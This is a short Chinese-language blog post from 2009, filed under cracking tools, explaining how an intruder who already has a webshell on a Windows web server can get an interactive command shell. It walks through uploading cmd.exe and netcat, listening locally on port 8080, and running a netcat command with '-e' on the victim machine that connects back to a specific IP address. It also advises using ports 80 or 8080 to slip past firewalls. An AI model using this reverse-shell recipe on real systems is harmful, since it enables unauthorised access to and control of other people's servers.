百度空间 | 百度首页 
 
查看文章
 
黑客技术
2009年08月02日 星期日 上午 03:00
虽然是低权限的,能做的事和webshell上的差不多,不过使用起来还是要方便很多。

前提:
1.能用webshell运行cmd命令。
方法有很多,首先是wscript.shell,如果被改名或者被删了,就找可运行目录上传cmd.exe。

2.上传nc。可以跟cmd.exe上传到同一目录。

步骤:
现在本地监听一个端口。

nc -vv -l -p 8080

最好是80或8080这样的端口,被防火墙拦截的几率小很多。我机器80被apache占了,就用8080了。

在webshell运行下面命令连接我们监听的端口得到cmdshell:

nc -vv 222.71.138.177 8080 -e c:\documents and settings\all users\documents\cmd.exe

(假设cmd.exe是上传在“c:\documents and settings\all users\documents\”这个目录的)
稍等片刻,不出意外的话就可以得到cmdshell了。

不过我前面也说了,是低权限的cmdshell,能做的事情很少,但如果我们要运行很多cmd命令的话,还是要方便很多。
如果要在反弹的cmdshell里面运行上传的程序,要用如下个格式:

c:\windows\system32\inetsrv>"c:\documents and settings\all users\documents\cmd.exe"



类别:破解工具使用 | 添加到搜藏 | 浏览() | 评论 (0)
 
网友评论:
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu